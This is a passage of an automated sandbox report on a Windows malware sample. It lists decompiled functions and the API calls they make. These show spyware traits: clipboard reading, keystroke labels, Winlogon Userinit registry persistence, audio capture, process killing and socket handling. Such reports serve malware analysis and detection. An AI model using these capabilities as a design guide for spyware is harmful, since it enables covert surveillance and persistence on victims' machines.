                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                • String ID:
                                                • API String ID: 384503197-0
                                                • Opcode ID: 189da3c6838e0e41593f6e1784496108d7ff58ee8e714e689386fa2d0dce9f54
                                                • Instruction ID: 4e939de40dca9095a448b576e021db2f78c130c1437fa151339f1674c57617bc
                                                • Opcode Fuzzy Hash: 189da3c6838e0e41593f6e1784496108d7ff58ee8e714e689386fa2d0dce9f54
                                                • Instruction Fuzzy Hash: 28F07A7550011EAFCF05EFA4EC49CEE7B78FF08305B008469F916D61A4EB35A659CB58
                                                Function 00405F27 Relevance: 6.0, APIs: 4, Instructions: 27clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32(00000000), ref: 00405F2E
                                                • GetClipboardData.USER32(00000001), ref: 00405F3A
                                                • CloseClipboard.USER32 ref: 00405F42
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,00405FAF,?,?,00000000,75920F00,?,?,?,?,?,00404E4B), ref: 00405F5F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                                • String ID:
                                                • API String ID: 1727351239-0
                                                • Opcode ID: d478ae52d3541881166db364492bfd53198689d5dd96aae8b7dab692b99ba0bf
                                                • Instruction ID: 1ffb289fc15c253a8ce4468c475800d7011c80fd9a6238bfdee33d51b899dc74
                                                • Opcode Fuzzy Hash: d478ae52d3541881166db364492bfd53198689d5dd96aae8b7dab692b99ba0bf
                                                • Instruction Fuzzy Hash: 75E0E575604215BBD711AF55DC09FDF7B6CEB44792F008071BA05A6290D778EE448AAC
                                                Function 00402FC1 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                                • String ID:
                                                • API String ID: 2505548081-0
                                                • Opcode ID: 70bc603018a4d6fb02e188bbb681361e592b60785a331a472954851439aa302a
                                                • Instruction ID: 34a50c9a10af6f66b6a43d66d675860603b544ebab9912ac4283c124e560bdb2
                                                • Opcode Fuzzy Hash: 70bc603018a4d6fb02e188bbb681361e592b60785a331a472954851439aa302a
                                                • Instruction Fuzzy Hash: CAF0DF3650012FABCF04EF94DC48CEE7B78FB08606B008469F916921A0EB70AA15CB94
                                                Function 00404857 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                • SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                                • String ID:
                                                • API String ID: 3911305588-0
                                                • Opcode ID: 6921bf9f74ecac3d163fba166c7612fa00b2cbb12c7883d47c75d2523de36686
                                                • Instruction ID: b8639b4c3f5584123d4eb6d63a846cbe88495f67726950cc463a40c31f3fc01a
                                                • Opcode Fuzzy Hash: 6921bf9f74ecac3d163fba166c7612fa00b2cbb12c7883d47c75d2523de36686
                                                • Instruction Fuzzy Hash: DCF08235400299EFCB15EF60D448AD67FACAF05345F44C86AE58242961D774F648CBA8
                                                Function 0040D5FB Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D607
                                                • atoi.MSVCRT(00000000), ref: 0040D60E
                                                  • Part of subcall function 00411221: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041122E
                                                  • Part of subcall function 00411221: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041123C
                                                  • Part of subcall function 00411221: CloseHandle.KERNEL32(00000000), ref: 00411248
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                                • String ID:
                                                • API String ID: 1377568529-0
                                                • Opcode ID: c519c35377801fe86eac393eca2f91835084e6fc0f5292eb7c3139e0f5ea162f
                                                • Instruction ID: 26380ce70336d899dab22226d7e487bdf8044e3c9a5db75cebfd6218688f75aa
                                                • Opcode Fuzzy Hash: c519c35377801fe86eac393eca2f91835084e6fc0f5292eb7c3139e0f5ea162f
                                                • Instruction Fuzzy Hash: 09E039329041058BCB04ABA2EC1A9ED7724FB50706B10487AE102E20E0EE3C86418B08
                                                Function 0040D235 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D241
                                                • atoi.MSVCRT(00000000), ref: 0040D248
                                                  • Part of subcall function 004041EA: __EH_prolog.LIBCMT ref: 004041EF
                                                  • Part of subcall function 004041EA: closesocket.WS2_32(?), ref: 00404231
                                                  • Part of subcall function 004041EA: TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,00403F34,00000000), ref: 00404243
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@H_prologTerminateThreadatoiclosesocket
                                                • String ID:
                                                • API String ID: 3456773717-0
                                                • Opcode ID: caa45e012d3f6e01c16fbff2091330165b84fb76ca753fddd0fbff1317e4085b
                                                • Instruction ID: b0252f88482eed145658a90fd125d1444de0018e56bb530a97d103f32e5f4b7c
                                                • Opcode Fuzzy Hash: caa45e012d3f6e01c16fbff2091330165b84fb76ca753fddd0fbff1317e4085b
                                                • Instruction Fuzzy Hash: 6CE039365001058BCB04AFA2EC1A9ED7724FB60706B10487BE102E20E0EE3886418B08
                                                Function 0040DF18 Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • exit.MSVCRT ref: 0040DF1F
                                                • Sleep.KERNEL32(00000064), ref: 0040DF31
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                                • String ID:
                                                • API String ID: 772260455-0
                                                • Opcode ID: fd96720fa353685945af39df0368ced169ec12ce97ec13dac9ef4599e36da872
                                                • Instruction ID: 693ee0d68741e0e3129761a9d3621558fc12d3720b86c849e1c678a808bb8cd3
                                                • Opcode Fuzzy Hash: fd96720fa353685945af39df0368ced169ec12ce97ec13dac9ef4599e36da872
                                                • Instruction Fuzzy Hash: CBE0ED35A041158AC705FFA1EC596DD7720FB11706F10C47AE103A50E1DA789A098A59
                                                Function 00411254 Relevance: 6.0, APIs: 4, Instructions: 18threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00411267
                                                • GetCurrentThread.KERNEL32 ref: 0041126A
                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00411271
                                                • DuplicateHandle.KERNEL32(00000000), ref: 00411274
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Current$Process$DuplicateHandleThread
                                                • String ID:
                                                • API String ID: 3566409357-0
                                                • Opcode ID: 2ab43190f5b604454cf5a352529c051b1c01f207935ed87bb31ccec0189af06f
                                                • Instruction ID: 38d7d7bcd10e3e7f94af841772d4cdbd04b5f0e59b17d2760293204ebdb8a843
                                                • Opcode Fuzzy Hash: 2ab43190f5b604454cf5a352529c051b1c01f207935ed87bb31ccec0189af06f
                                                • Instruction Fuzzy Hash: 81D09E71940218B7DD106BE5AC0EFC63F5CDB09772F108421F60896090C6A5D5408AA4
                                                Function 0040DE7B Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • waveInStop.WINMM ref: 0040DE87
                                                • waveInClose.WINMM ref: 0040DE93
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$CloseStop
                                                • String ID:
                                                • API String ID: 575602608-0
                                                • Opcode ID: f931c9ff3249c7038e740fe15d5dd0a5bb43cb1608e01f55e5f006e2d1b7183b
                                                • Instruction ID: 369f43e0de260629e964fdaa4196c70bfe90d721fc10d047b7ad9bf77e98eea4
                                                • Opcode Fuzzy Hash: f931c9ff3249c7038e740fe15d5dd0a5bb43cb1608e01f55e5f006e2d1b7183b
                                                • Instruction Fuzzy Hash: 9AE0B6361000069BD709EF65EDAD5DC7B70FB21306B5484BAE503E20B1DB799A85CB19
                                                Function 0040AC55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                  • Part of subcall function 00402FC1: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                  • Part of subcall function 00402FC1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                  • Part of subcall function 00402FC1: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040AC91
                                                  • Part of subcall function 0040AA65: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                  • Part of subcall function 0040AA65: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                  • Part of subcall function 0040AA65: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                  • Part of subcall function 0040AA65: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                  • Part of subcall function 0040AA65: RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                  • Part of subcall function 0040AA65: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040ACAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                                • String ID: )A
                                                • API String ID: 4160275866-2712435313
                                                • Opcode ID: e1fbd969bfa8847527ac59f6f49a225000bc0d3961d5c8d419422c7e4b0151a1
                                                • Instruction ID: 90b2c34663bfede1f81ad504adb22b5c1fc9071e250d967feb13d94e9b5027c6
                                                • Opcode Fuzzy Hash: e1fbd969bfa8847527ac59f6f49a225000bc0d3961d5c8d419422c7e4b0151a1
                                                • Instruction Fuzzy Hash: 09F0627180010EAFCF01AFA4DD45CEE3B35BB04308F044469F925220A1E636D665DF54
                                                Function 00405E99 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00405ECF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                • String ID: [LCtrl] $ [RCtrl]
                                                • API String ID: 4257247948-618823999
                                                • Opcode ID: 48c17c4288359509434eccdcf86bbe790992d5d7b660cafcfd6c52e29f338ef6
                                                • Instruction ID: 0fa1c646a68d738d294a307aeb2d6c86b711834aa80b4c3109dba0da690a6adc
                                                • Opcode Fuzzy Hash: 48c17c4288359509434eccdcf86bbe790992d5d7b660cafcfd6c52e29f338ef6
                                                • Instruction Fuzzy Hash: 2FE092313046083FE604B76DC807ABF3A6CE780741F5000AAE422E32C5EAB9AF0446DB
                                                Function 0041175B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wcscmp
                                                • String ID: {@
                                                • API String ID: 3392835482-2098953823
                                                • Opcode ID: d95ec0bb8266be435ecca583382595df1105d1b7d4fe147b2264fb43a209f0ff
                                                • Instruction ID: 11a89765c93ce52251f38220843e3e8c64c382c7746bde868679b759e0c325e2
                                                • Opcode Fuzzy Hash: d95ec0bb8266be435ecca583382595df1105d1b7d4fe147b2264fb43a209f0ff
                                                • Instruction Fuzzy Hash: 85E0C23638421A399A042B99FC00AD6BB9CCB007F2B204037FA14E26E0EA95998006C8
                                                Function 0040D771 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D791
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D79E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                                • String ID: open
                                                • API String ID: 2002754128-2758837156
                                                • Opcode ID: 5091b8a62ed675dbfd12322786ee8a76f7358949c827ea5be40e7ebe8590cae5
                                                • Instruction ID: 88af3973c4d49b6355a75c50cd1fa310c6bf70a69c664a4eb8cb2e9948857b7f
                                                • Opcode Fuzzy Hash: 5091b8a62ed675dbfd12322786ee8a76f7358949c827ea5be40e7ebe8590cae5
                                                • Instruction Fuzzy Hash: 82E0E6B15452197FEF146BA09CD5DFA376C970430AF1044AAB502A20D1DA759E844628
                                                Function 00402049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
